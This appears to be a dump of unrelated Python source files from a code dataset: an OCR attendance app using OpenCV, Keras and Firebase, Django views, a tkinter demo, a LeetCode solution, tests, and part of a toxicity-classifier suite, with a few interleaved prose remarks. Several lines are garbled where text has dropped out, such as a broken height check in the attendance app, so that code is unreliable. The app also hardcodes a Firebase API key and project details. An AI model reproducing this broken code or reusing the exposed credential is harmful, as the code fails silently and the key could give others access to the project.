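getBestShift and shift in the entry above implement the classic MNIST-style re-centering: measure the glyph's center of mass, then translate it to the image center with cv2.warpAffine. A toy run, assuming the two functions are in scope:

import numpy as np

img = np.zeros((28, 28), dtype=np.float32)
img[2:8, 2:8] = 255            # a blob stuck in the top-left corner
sx, sy = getBestShift(img)     # offset from center of mass to image center
centered = shift(img, sx, sy)  # same blob, now roughly centered at (14, 14)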
tr, br, bl) = rect\n \n\t# compute the width of the new image, which will be the\n\t# maximum distance between bottom-right and bottom-left\n\t# x-coordiates or the top-right and top-left x-coordinates\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\t# compute the height of the new image, which will be the\n\t# maximum distance between the top-right and bottom-right\n\t# y-coordinates or the top-left and bottom-left y-coordinates\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n \n\t# now that we have the dimensions of the new image, construct\n\t# the set of destination points to obtain a \"birds eye view\",\n\t# (i.e. top-down view) of the image, again specifying points\n\t# in the top-left, top-right, bottom-right, and bottom-left\n\t# order\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n # initialize the dimensions of the image to be resized and\n # grab the image size\n dim = None\n (h, w) = image.shape[:2]\n\n # if both the width and height are None, then return the\n # original image\n if width is None and height is None:\n return image\n\n # check to see if the width is None\n if width is None:\n # calculate the ratio of the height and construct the\n # dimensions\n r = height / float(h)\n dim = (int(w * r), height)\n\n # otherwise, the height is None\n else:\n # calculate the ratio of the width and construct the\n # dimensions\n r = width / float(w)\n dim = (width, int(h * r))\n\n # resize the image\n resized = cv2.resize(image, dim, interpolation = inter)\n\n # return the resized image\n return resized\ndef get_contour_precedence(contour, cols):\n origin = cv2.boundingRect(contour)\n return origin[1] * cols + origin[0]\n\n\n\nconfig= {\n\t\"apiKey\": \"AIzaSyDYHyTfB4u_OswwN507ql9kXx5sdedXZEg\",\n\t\"project_id\": \"attendance-app-1c683\",\n\t\"authDomain\": \"attendance-app-1c683.firebaseapp.com\",\n\t\"storageBucket\": \"attendance-app-1c683.appspot.com\",\n\t\"databaseURL\" : \"https://attendance-app-1c683.firebaseio.com\",\n\t\"messagingSenderId\": \"522004839232\"\n}\n\ndef main():\n\tfirebase =Firebase(config)\n\tdb=firebase.database()\n\twhile(True):\n\t\tusers=db.child(\"uploads\").child(\"abc\").child(\"a\").get()\n\t\tif users.val()!=None:\n\t\t\turllib.request.urlretrieve(str(users.val()),\"test.jpg\")\n\t\t\tbreak\n\tdb.child(\"uploads\").remove()\n\n\tnew_model = keras.models.load_model('cnn.h5')\n\n\ttry:\n\t\t# read image\n\t\timg = cv2.imread('test.jpg')\n\t\timg=image_resize(img,width=800,height=700)\n\t\timage=orientation1.angle(img)\n\t\tgray=image\n\t\tret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n\t\tkernel = np.ones((5,100), np.uint8)\n\t\timg_dilation = cv2.dilate(thresh, kernel, iterations=1)\n\t\t# cv2.imshow('dilated',img_dilation)\n\t\t# cv2.waitKey(0)\n\t\t# cv2.imwrite('dilated.jpg', img_dilation) \n\t\t#find contours\n\t\t_,ctrs, hier = 
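four_point_transform reduces to two OpenCV calls once the corners are ordered: getPerspectiveTransform for the 3x3 homography and warpPerspective to apply it. Directly, with made-up corner coordinates:

import cv2
import numpy as np

src = np.array([[50, 40], [420, 60], [440, 380], [30, 360]], dtype='float32')  # tl, tr, br, bl
dst = np.array([[0, 0], [399, 0], [399, 299], [0, 299]], dtype='float32')      # 400x300 target
M = cv2.getPerspectiveTransform(src, dst)
# warped = cv2.warpPerspective(image, M, (400, 300))  # 'image' is any loaded frame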
cv2.findContours(img_dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\t\t#sort contours\n\t\tsorted_ctrs = sorted(ctrs, key=lambda ctr: (cv2.boundingRect(ctr)[0],cv2.boundingRect(ctr)[1]))\n\t\toutput=[]\n\t\tfor i, ctr in enumerate(sorted_ctrs):\n\t\t\t# Get bounding box\n\t\t\tx, y, w, h = cv2.boundingRect(ctr)\n\n\t\t\t# Getting ROI\n\t\t\troi = image[y:y+h, x:x+w]\n\t\t\tarea=w*h\n\n\t\t\tif h 10 and 100 < w < 500 and area < 12000 :\n\t\t\t\tgrayy= roi\n\t\t\t\t# roi=image_resize(roi,width=100,height=30)\n\t\t\t\t# cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),1)\n\t\t\t\tret,threshh = cv2.threshold(grayy,127,255,cv2.THRESH_BINARY_INV)\n\t\t\t\t# cv2.imshow('inner',threshh)\n\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t# cv2.imwrite('word.jpg', threshh) \n\t\t\t\t_,ctrss, hierr = cv2.findContours(threshh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\t\t\t\tsorted_ctrss = sorted(ctrss, key=lambda ctr: cv2.boundingRect(ctr)[0])\n\t\t\t\tnum=0\n\t\t\t\tfor ii, ctrr in enumerate(sorted_ctrss):\n\t\t\t\t\t# Get bounding box\n\t\t\t\t\txx, yy, ww, hh = cv2.boundingRect(ctrr)\n\n\t\t\t\t\t# Getting ROI\n\t\t\t\t\troii = roi[yy-2:yy+hh+2, xx-1:xx+ww+1]\n\t\t\t\t\tif 1 < ww and 4 < hh :\n\t\t\t\t\t\t# cv2.imshow('wer ',roii)\n\t\t\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t\t\t# cv2.rectangle(img,(xx,yy),(xx+ww,yy+hh),(0,255,0),1)\n\n\t\t\t\t\t\t# cv2.imwrite('single.jpg', roii) \n\t\t\t\t\t\tpic=image_resize(roii,width=28,height=28)\n\n\t\t\t\t\t\t(thresh, pic) = cv2.threshold(pic, 120, 255, cv2.THRESH_BINARY_INV)\n\t\t\t\t\t\tpic=preprocess(pic)\n\t\t\t\t\t\t# cv2.imshow('inner',pic)\n\t\t\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t\t\t# cv2.imwrite('singlemnist.jpg', pic) \n\t\t\t\t\t\tpic=np.array(pic).reshape(28,28,1)\n\t\t\t\t\t\tpic=np.expand_dims(pic,axis=0) \n\t\t\t\t\t\tprediction=new_model.predict(pic)\n\t\t\t\t\t\tx=np.argmax(prediction)\n\t\t\t\t\t\tnum=num*10+x\n\t\t\t\toutput.append(num)\n\t\toutput.sort()\n\t\tfile=open(\"output.txt\",\"w+\")\n\t\tfor i in output:\n\t\t\tfile.write(str(i))\n\t\t\tfile.write('\\n')\n\t\tfile.close()\n\t\t#entering attendence in sheet\n\t\t# cv2.imwrite('final.jpg',img)\n\t\tloc=(\"/home/pankaj/Desktop/minor/attendence.xlsx\")\n\t\twb1 = openpyxl.load_workbook(loc) \n\t\tws1 = wb1.worksheets[0] \n\t\twb2=openpyxl.Workbook()\n\t\tws2=wb2.active\n\t\tnrow=ws1.max_row\n\t\tncol=ws1.max_column\n\t\tfor i in range(1,200):\n\t\t\tc1=ws1.cell(row=i,column=1)\n\t\t\tif not c1.value:\n\t\t\t\tnrow=i\n\t\t\t\tbreak\n\t\tfor i in range(1,200):\n\t\t\tc1=ws1.cell(row=1,column=i)\n\t\t\tif not c1.value:\n\t\t\t\tncol=i\n\t\t\t\tbreak\n\t\tprint(ncol)\n\t\tfor i in range(1,nrow):\n\t\t\tfor j in range(1,ncol):\n\t\t\t\tcopyfrom=ws1.cell(row=i,column=j)\n\t\t\t\tws2.cell(row=i,column=j).value=copyfrom.value\n\t\tncol=ncol\n\t\ttoday=date.today()\n\t\ttoday=today.strftime(\"%m/%d/%Y\")\n\t\tc1=ws2.cell(row=1,column=ncol)\n\t\tc1.value=today\n\t\tfor i in range(2,nrow+1):\n\t\t\tc1=ws2.cell(row=i,column=2)\n\t\t\t# flag=0\n\t\t\tfor j in range(len(output)):\n\t\t\t\tif c1.value == output[j]:\n\t\t\t\t\tws2.cell(row=i,column=ncol).value=\"P\"\n\n\t\tfor i in range(2,nrow):\n\t\t\tc1=ws2.cell(row=i,column=ncol)\n\t\t\tif not c1.value:\n\t\t\t\tc1.value=\"A\"\n\t\t#if attendence if of same day reject\n\t\tif ws2.cell(row=1,column=ncol).value == ws2.cell(row=1,column=ncol-1).value:\n\t\t\tws2.delete_cols(ncol)\n\t\twb2.save(\"/home/pankaj/Desktop/minor/attendence.xlsx\")\n\texcept:\n\t\tprint(\"error 
occured\")\n\t\treturn\n\tstorage=firebase.storage()\n\tstorage.child(\"attendence.xlsx\").put(\"attendence.xlsx\")\n\n\treturn\nif __name__ == '__main__':\n\tfirebase =Firebase(config)\n\tdb=firebase.database()\n\tdb.child(\"uploads\").remove()\n\twhile(True):\n\t\tmain()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"626202785","text":"# stores/view.py\r\n\r\nfrom django.shortcuts import redirect,render\r\n#from django.forms.models import modelform_factory\r\nfrom .forms import StoreForm\r\nfrom .models import Store\r\n\r\n#from django.http import HttpResponse\r\n\r\n# Create your views here.\r\n\r\ndef store_list(request):\r\n\tstores = Store.objects.all()\r\n\treturn render(request, 'stores/store_list.html', {'stores': stores})\r\n\r\ndef store_detail(request, pk):\r\n try:\r\n store = Store.objects.get(pk=pk)\r\n except Store.DoesNotExist:\r\n raise Http404\r\n return render(request, 'stores/store_detail.html', {'store': store})\r\n\t\r\ndef store_create(request):\r\n #StoreForm = modelform_factory(Store, fields=('name', 'notes',))\r\n if request.method == 'POST':\r\n form = StoreForm(request.POST,submit_title='建立')\r\n if form.is_valid():\r\n store = form.save()\r\n return redirect(store.get_absolute_url())\r\n else:\r\n form = StoreForm(submit_title='建立')\r\n return render(request, 'stores/store_create.html', {'form': form})\r\n\t\r\ndef store_update(request, pk):\r\n try:\r\n store = Store.objects.get(pk=pk)\r\n except Store.DoesNotExist:\r\n raise Http404\r\n #StoreForm = modelform_factory(Store, fields=('name', 'notes',))\r\n if request.method == 'POST':\r\n form = StoreForm(request.POST, instance=store,submit_title='更新')\r\n if form.is_valid():\r\n store = form.save()\r\n return redirect(store.get_absolute_url())\r\n else:\r\n form = StoreForm(instance=store,submit_title='更新')\r\n return render(request, 'stores/store_update.html', {\r\n 'form': form, 'store': store,\r\n })","sub_path":"stores/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"21602604","text":"#!/usr/bin/env python3\n# vim: set fileencoding=utf-8\n\nimport tkinter\nfrom tkinter import ttk\n\nimport sys\n\n\ndef exit():\n sys.exit(0)\n\n\nroot = tkinter.Tk()\n\nstyle = ttk.Style()\n\nstyle.configure(\"Red.TButton\", background=\"#ff8080\")\n\nbutton1 = ttk.Button(root, text=\"clam\", command=lambda: style.theme_use(\"clam\"))\nbutton2 = ttk.Button(root, text=\"alt\", command=lambda: style.theme_use(\"alt\"))\nbutton3 = ttk.Button(root, text=\"default\", command=lambda: style.theme_use(\"default\"))\nbutton4 = ttk.Button(root, text=\"classic\", command=lambda: style.theme_use(\"classic\"))\n\nquitButton = ttk.Button(root, text=\"Exit\", style=\"Red.TButton\", command=exit)\n\nbutton1.grid(column=1, row=1, sticky=\"we\")\nbutton2.grid(column=2, row=1, sticky=\"we\")\nbutton3.grid(column=1, row=2, sticky=\"we\")\nbutton4.grid(column=2, row=2, sticky=\"we\")\n\nquitButton.grid(column=2, row=5, sticky=\"we\")\n\nlabel = tkinter.Label(root, text=\"Hello world\")\nentry = tkinter.Entry(root)\ncheckbutton = tkinter.Checkbutton(text=\"Do you like Tkinter?\")\n\ncheckbutton.grid(column=1, row=3, columnspan=2, sticky=\"w\")\nlabel.grid(column=1, row=4)\nentry.grid(column=2, 
row=4)\n\nroot.mainloop()\n","sub_path":"Python2/examples/tkinter/18_theme_selection.py","file_name":"18_theme_selection.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622625088","text":"\"\"\"\n35. Search Insert Position\nGiven a sorted array of distinct integers and a target value, \nreturn the index if the target is found. \nIf not, return the index where it would be if it were inserted in order.\n\nExample 1:\nInput: nums = [1,3,5,6], target = 5\nOutput: 2\nExample 2:\nInput: nums = [1,3,5,6], target = 2\nOutput: 1\nExample 3:\nInput: nums = [1,3,5,6], target = 7\nOutput: 4\nExample 4:\nInput: nums = [1,3,5,6], target = 0\nOutput: 0\nExample 5:\nInput: nums = [1], target = 0\nOutput: 0\n \n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums contains distinct values sorted in ascending order.\n-104 <= target <= 104\n\"\"\"\nclass Solution:\n    def searchInsert(self, nums: List[int], target: int) -> int:\n        if nums[0] > target : return 0\n        L = len(nums)\n        if nums[-1] < target : return L\n        \n        res=0\n        # bisection search but only one iteration\n        left , right = 0, L-1\n        mid = (left+right)//2\n        if nums[mid] < target :\n            res , L = mid , L\n        elif nums[mid] > target :\n            res , L = 0, mid\n        while target > nums[res] and res2.5],crs['ra'][crs['Q']>2.5],crs['dec'][crs['Q']>2.5]\n    zoom_ras,zoom_decs=all_ras[np.abs(all_zs-spec_dict[strname]['z'])=10:\n        L.append(x%10)\n        x = x//10\n    L.append(x)\n    L.reverse()\n    return L\n\ndef list2int(L):\n    \"\"\"Return the integer written in base 10 by the list of digits L\"\"\"\n    n = 0\n    for c in L:\n        n = c + 10*n\n    return n\n\ndef K(n):\n    \"\"\"Kaprekar of n\"\"\"\n    c = int2list(n)\n    d = int2list(n)\n    c.sort()\n    d.sort(reverse = True)\n    return list2int(d)-list2int(c)\n\ndef Kaprekar(n):\n    x = n\n    L = []\n    while not (x in L):\n        L.append(x)\n        x = K(x)\n    return L\n","sub_path":"Exercices/03_tableaux/TAB-011/Kaprekar.py","file_name":"Kaprekar.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"383105967","text":"import unittest\n\nfrom parameterized import parameterized\n\nfrom dynamic.tasks.longest_common_subsequence import LongestCommonSubSequence\n\n\nclass TestLongestCommonSubsequence(unittest.TestCase):\n\n    def setUp(self):\n        self.lcs = LongestCommonSubSequence()\n\n    @parameterized.expand([\n        ['1', 'abcbdab', 'bdcaba', 'bdab']\n    ])\n    def test_find_longest_subsequence_rec(self, n, s1, s2, r):\n        self.assertEqual(self.lcs.lcs_recursive(s1, s2), r)\n\n    @parameterized.expand([\n        ['1', 'abcbdab', 'bdcaba', 'bcba'],\n        ['2', 'abACCGGTCGAGTGCGCGGAAGCCGGCCGAA', 'GTCGTTCGGAATGCCGTTGCTCTGTAAA', 'GTCGTCGGAAGCCGGCCGAA'],\n        ['3', '10010101', '010110110', '100110'],\n        ['4', '', '', ''],\n    ])\n    def test_find_longest_subsequence(self, n, s1, s2, r):\n        self.assertEqual(self.lcs.lcs(s1, s2), r)\n\n    @parameterized.expand([\n        ['1', 'abcbdab', 'bdcaba', 'bcba'],\n        ['2', 'abACCGGTCGAGTGCGCGGAAGCCGGCCGAA', 'GTCGTTCGGAATGCCGTTGCTCTGTAAA', 'GTCGTCGGAAGCCGGCCGAA'],\n        ['3', '10010101', '010110110', '100110'],\n        ['4', '', '', ''],\n        ['5', '', 'a', ''],\n        ['6', 'a', '', '']\n    ])\n    def test_find_longest_subsequence_dict(self, n, s1, s2, r):\n        self.assertEqual(self.lcs.lcs_dict(s1, s2), r)\n\n\n    @parameterized.expand([\n        ['1', 'abca', ['abc']],\n        ['1', 'ba', ['a','b']],\n        ['2', '', ['']],\n        ['3', 'cbdbf', ['bdf','cdf']],\n        ['4', 'wladbce', ['abce']],\n    ])\n    def 
test_increasing_lcs(self,n,s,r):\n self.assertEqual(r, self.lcs.lis(s))\n","sub_path":"crackinginterview-source/algo/tests/dynamic/test_longest_common_subsequence.py","file_name":"test_longest_common_subsequence.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"225674008","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport numpy as np\nimport scipy\n\n\nfig = plt.figure()\nax = fig.add_subplot(aspect='equal')\n\ncirc = plt.Circle((0, 0), radius=1, edgecolor='black', facecolor='None')\nax.add_patch(circ)\nplt.show()\n\nx = np.arange(0, 2*np.pi, 0.01)\nline, = ax.plot(x, np.sin(x))\n\n\ndef init(): # only required for blitting to give a clean slate.\n line.set_ydata([np.nan] * len(x))\n return line,\n\n\ndef animate(i):\n line.set_ydata(np.sin(x + i / 10)) # update the data.\n return line,\n\n\nani = animation.FuncAnimation(\n fig, animate, init_func=init, interval=2, blit=True, save_count=50)\n\n# To save the animation, use e.g.\n#\n# ani.save(\"movie.mp4\")\n#\n# or\n#\n# from matplotlib.animation import FFMpegWriter\n# writer = FFMpegWriter(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save(\"movie.mp4\", writer=writer)\n\nplt.show()","sub_path":"00Junk00/OldStuff/AudioLocalizationTest/PlotAngle.py","file_name":"PlotAngle.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"64928398","text":"from collections import Counter\r\nfrom collections import defaultdict\r\nfrom copy import copy, deepcopy\r\nfrom gensim.models.keyedvectors import KeyedVectors\r\nfrom multiprocessing import Pool\r\nfrom nltk.classify.scikitlearn import SklearnClassifier\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.inspection import permutation_importance\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import classification_report, fbeta_score, roc_auc_score, roc_curve\r\nfrom sklearn.metrics import f1_score, plot_roc_curve, precision_recall_curve, auc\r\nfrom sklearn.metrics import PrecisionRecallDisplay, average_precision_score\r\nfrom sklearn.model_selection import StratifiedKFold, GridSearchCV, train_test_split, cross_val_score\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.feature_selection import SelectFromModel, SelectKBest, f_classif\r\nfrom sklearn.svm import SVC\r\nfrom src import classifiers\r\nfrom src import convo_politeness\r\nfrom src import create_features\r\nfrom src import text_modifier\r\nfrom src import text_parser\r\nfrom wordfreq import word_frequency\r\nimport itertools\r\nimport logging\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport operator\r\nimport pandas as pd\r\nimport pathlib\r\nimport pickle\r\nimport random\r\nimport re\r\nimport textblob\r\nimport time\r\nimport warnings\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom src.SentiCR import SentiCR\r\n\r\nimport time\r\nnow = str(int(time.time())) \r\n\r\noracle_data = pd.read_csv(\"src/SentiCR/oracle.csv\")\r\nSentiCR_model = 
SentiCR.SentiCR(algo=\"GBT\",training_data= oracle_data)\r\n\r\nimport sys\r\nsys.path.insert(0, \"politeness3\")\r\n\r\n# stop words: https://www.geeksforgeeks.org/removing-stop-words-nltk-python/\r\nstop_words = [\"ourselves\", \"hers\", \"between\", \"yourself\", \"but\", \"again\", \"there\", \"about\",\r\n\"once\", \"during\", \"out\", \"very\", \"having\", \"with\", \"they\", \"own\", \"an\", \"be\",\r\n\"some\", \"for\", \"do\", \"its\", \"yours\", \"such\", \"into\", \"of\", \"most\", \"itself\",\r\n\"other\", \"off\", \"is\", \"s\", \"am\", \"or\", \"who\", \"as\", \"from\", \"him\", \"each\",\r\n\"the\", \"themselves\", \"until\", \"below\", \"are\", \"we\", \"these\", \"your\", \"his\",\r\n\"through\", \"don\", \"nor\", \"me\", \"were\", \"her\", \"more\", \"himself\", \"this\", \"down\",\r\n\"should\", \"our\", \"their\", \"while\", \"above\", \"both\", \"up\", \"to\", \"ours\", \"had\",\r\n\"she\", \"all\", \"no\", \"when\", \"at\", \"any\", \"before\", \"them\", \"same\", \"and\",\r\n\"been\", \"have\", \"in\", \"will\", \"on\", \"does\", \"yourselves\", \"then\", \"that\",\r\n\"because\", \"what\", \"over\", \"why\", \"so\", \"can\", \"did\", \"not\", \"now\", \"under\",\r\n\"he\", \"you\", \"herself\", \"has\", \"just\", \"where\", \"too\", \"only\", \"myself\",\r\n\"which\", \"those\", \"i\", \"after\", \"few\", \"whom\", \"t\", \"being\", \"if\", \"theirs\",\r\n\"my\", \"against\", \"a\", \"by\", \"doing\", \"it\", \"how\", \"further\", \"was\", \"here\",\r\n\"than\"]\r\n\r\n# flip due to the removal of SE words\r\nFLIP = 1\r\nDONT_FLIP = 0\r\nTEXT_BASED = 0\r\nLOGS_BASED = 1\r\nCOMBINED = 2\r\n\r\nNUM_TRIALS = 10\r\nN_SPLITS = 10\r\nTEST_SIZE = 0.33\r\nfeature_names = [\"Text-based\", \"Logs-based\", \"Combined\"]\r\n\r\n\r\ndef isascii(s):\r\n  return all(ord(c) < 128 for c in s)\r\n\r\n\r\nnum_subproc = 20\r\nmodel = 0\r\n\r\nse_file = open(\"src/data/SE_words_G.list\")\r\nSE_words = [se_word.strip() for se_word in se_file.readlines()]\r\n\r\ndef score(lexicon_dataframe, text):\r\n  \"\"\"Need to do stemming later\"\"\"\r\n\r\n  all_specific = lexicon_dataframe[\"specific\"].unique()\r\n\r\n  text = word_tokenize(text)\r\n  text = [i.lower() for i in text]\r\n\r\n  score_dict = {}\r\n  for category in all_specific:\r\n    score_dict[category] = 0\r\n    category_words = set(lexicon_dataframe[lexicon_dataframe[\"specific\"] ==\\\r\n        category][\"word\"].tolist())\r\n    score_dict[category] = len(category_words.intersection(text))\r\n\r\n  return score_dict\r\n\r\n\r\ndef rescore(row, features, tf_idf_counter):\r\n  new_sentence = row[\"text\"]\r\n  new_features_dict = {}\r\n  for f in features:\r\n    new_features_dict[f] = row[f]\r\n\r\n  if \"perspective_score\" in features:\r\n    persp_score = create_features.get_perspective_score(new_sentence, \"en\")\r\n    new_features_dict[\"perspective_score\"] = persp_score[0]\r\n    new_features_dict[\"identity_attack\"] = persp_score[1]\r\n\r\n  if \"sentiment\" in features:\r\n    new_features_dict[\"sentiment\"] = SentiCR_model.get_sentiment_polarity(new_sentence)[0]\r\n\r\n  if \"word2vec_0\" in features:\r\n    # Calculate word2vec\r\n    df = pd.DataFrame([{\"text\": new_sentence}])\r\n    df = text_modifier.add_word2vec(df).iloc[0]\r\n    word2vec_values = [df[\"word2vec_{}\".format(i)] for i in range(300)]\r\n\r\n    for i in range(300):\r\n      new_features_dict[\"word2vec_{}\".format(i)] = word2vec_values[i]\r\n\r\n  if \"LIWC_anger\" in features:\r\n    lexicon_df = pd.read_csv(\"src/data/lexicons.txt\")\r\n    s = score(lexicon_df, new_sentence)\r\n    
new_features_dict[\"LIWC_anger\"] = s[\"LIWC_anger\"]\r\n\r\n if \"negative_lexicon\" in features:\r\n lexicon_df = pd.read_csv(\"src/data/lexicons.txt\")\r\n s = score(lexicon_df, new_sentence)\r\n new_features_dict[\"negative_lexicon\"] = s[\"negative_lexicon\"]\r\n\r\n if \"nltk_score\" in features:\r\n sid = SentimentIntensityAnalyzer()\r\n nltk_score = sid.polarity_scores(new_sentence)[\"compound\"]\r\n new_features_dict[\"nltk_score\"] = nltk_score\r\n\r\n if \"polarity\" in features or \"subjectivity\" in features:\r\n textblob_scores = textblob.TextBlob(new_sentence)\r\n new_features_dict[\"polarity\"] = textblob_scores.polarity\r\n new_features_dict[\"subjectivity\"] = textblob_scores.subjectivity\r\n\r\n if \"tf_idf_0\" in features:\r\n df = pd.DataFrame([{\"text\": new_sentence}])\r\n df = add_counts(tf_idf_counter, df, name=\"tf_idf_\").iloc[0]\r\n\r\n for f in features:\r\n if \"tf_idf_\" in f:\r\n new_features_dict[f] = df[f]\r\n\r\n return new_features_dict\r\n\r\n# postprocessing (usually only done for toxic comments)\r\n# returns list of clean text variants\r\n# Sophie: Jun 17: not used?\r\ndef clean_text(text):\r\n result = []\r\n words = text.split(\" \")\r\n words = [a.strip(\",.!?:; \") for a in words]\r\n\r\n words = list(set(words))\r\n words = [\r\n word for word in words if not isascii(word) or word.lower() in SE_words\r\n ]\r\n\r\n for word in set(words):\r\n # Maybe unkify?\r\n result += [\r\n re.sub(r\"[^a-zA-Z0-9]\" + re.escape(word.lower()) + r\"[^a-zA-Z0-9]\",\r\n \" potato \", \" \" + text.lower() + \" \").strip()\r\n ]\r\n\r\n tokenizer = RegexpTokenizer(r\"\\w+\")\r\n all_words = tokenizer.tokenize(text)\r\n\r\n result += [text]\r\n return result\r\n\r\n\r\n# input: comment, trained model, features used, ?\r\n# output: 0 if the comment was labeled to be toxic NOT due to SE words (it IS toxic)\r\n# 1 if the comment was labeled to be toxic due to SE words (it shouldn't\r\n# be toxic)\r\ndef remove_SE_comment(features_df, Google, row, model, features, max_values, tf_idf_counter):\r\n text = row[\"text\"]\r\n t = time.time()\r\n words = text.split(\" \")\r\n words = [a.strip(\",.!?:; \") for a in words]\r\n\r\n words = list(set(words))\r\n # SE_words: words with a different distribution in SE context than in\r\n # normal EN context\r\n words = [\r\n word for word in words if not word.isalpha() or word.lower() in SE_words\r\n ]\r\n\r\n # the comment was labeld to be toxic not because it contains SE words\r\n if len(words) == 0:\r\n return 0\r\n\r\n smallest_new_pred = 1\r\n for word in set(words):\r\n # if word is a stop word\r\n if word in stop_words or (not word.isalpha()):\r\n continue\r\n\r\n new_sentence = re.sub(\r\n r\"[^a-zA-Z0-9]\" + re.escape(word.lower()) + r\"[^a-zA-Z0-9]\", \" potato \",\r\n text.lower())\r\n # re-compute features\r\n row[\"text\"] = new_sentence\r\n new_features_dict = rescore(row, features, tf_idf_counter)\r\n\r\n new_features = {}\r\n for f in features:\r\n max_f = max_values[f]\r\n \r\n if max_f != 0:\r\n new_features[f] = new_features_dict[f]/max_f\r\n else:\r\n new_features[f] = new_features_dict[f]\r\n\r\n # after removing SE words, the model labels it as non-toxic\r\n new_features = pd.DataFrame([new_features])\r\n new_pred = model.predict_proba(new_features)[0][1]\r\n if new_pred < smallest_new_pred:\r\n smallest_new_pred = new_pred\r\n\r\n # go back to the prev level to see if it's below the threshold\r\n return smallest_new_pred\r\n\r\nclass Suite:\r\n\r\n def __init__(self):\r\n global counter\r\n\r\n self.features = 
[]\r\n self.feature_type = \"\"\r\n self.max_feature_values = {}\r\n self.nice_features = []\r\n self.parameter_names = []\r\n self.hyper_parameters_lists = []\r\n self.param_grid = {}\r\n self.last_time = time.time()\r\n self.tf_idf_counter = 0\r\n self.use_filters = True\r\n\r\n self.anger_classifier = pickle.load(open(\"src/pickles/anger.p\", \"rb\"))\r\n self.all_words = pickle.load(open(\"src/pickles/all_words.p\", \"rb\"))\r\n self.all_false = {word: False for word in self.all_words}\r\n\r\n start_time = time.time()\r\n self.alpha = 0.1\r\n\r\n self.all_train_data = None\r\n self.test_data = None\r\n self.train_data = None\r\n self.model_function = None\r\n self.model = None\r\n self.Google = False\r\n\r\n def set_G(self, G):\r\n self.Google = G\r\n\r\n def set_model_function(self, model_function):\r\n self.model_function = model_function\r\n\r\n def set_trained_model(self, trained_model):\r\n self.model = trained_model\r\n\r\n def add_parameter(self, name, l):\r\n self.parameter_names.append(name)\r\n self.hyper_parameters_lists.append(l)\r\n\r\n def set_ratios(self, ratios):\r\n self.ratio = ratios\r\n\r\n def set_train_set(self, train_collection):\r\n self.train_collection = train_collection\r\n self.all_train_data = create_features.create_features(\r\n train_collection, \"training\", self.Google)\r\n\r\n # we need to normalize features for SVM\r\n for f in self.all_train_data.columns:\r\n if f in [\"text\", \"author\", \"author_association\", \"url\", \"html_url\"]: \r\n continue\r\n try:\r\n self.max_feature_values[f] = max(self.all_train_data[f].tolist())\r\n except:\r\n pass\r\n logging.info(\r\n \"Prepared training dataset, it took {} seconds\".format(time.time() - \\\r\n self.last_time))\r\n self.last_time = time.time()\r\n\r\n def set_unlabeled_set(self, test_collection):\r\n self.test_collection = test_collection\r\n self.test_data = create_features.create_features(test_collection,\r\n \"unlabeled\", self.Google)\r\n # normalize feature\r\n for f in self.test_data.columns:\r\n if f in [\"text\", \"author\", \"author_association\", \"url\", \"html_url\"]: \r\n continue\r\n try:\r\n self.max_feature_values[f] = max(self.test_data[f].tolist())\r\n except:\r\n pass\r\n logging.info(\r\n \"Prepared unlabeled dataset, it took {} seconds\".format(time.time() - \\\r\n self.last_time))\r\n\r\n self.last_time = time.time()\r\n\r\n def convert(self, test_sentence):\r\n ret = copy(self.all_false)\r\n\r\n for word in word_tokenize(str(test_sentence).lower()):\r\n ret[word] = True\r\n\r\n return ret\r\n\r\n def remove_I(self, test_issues):\r\n 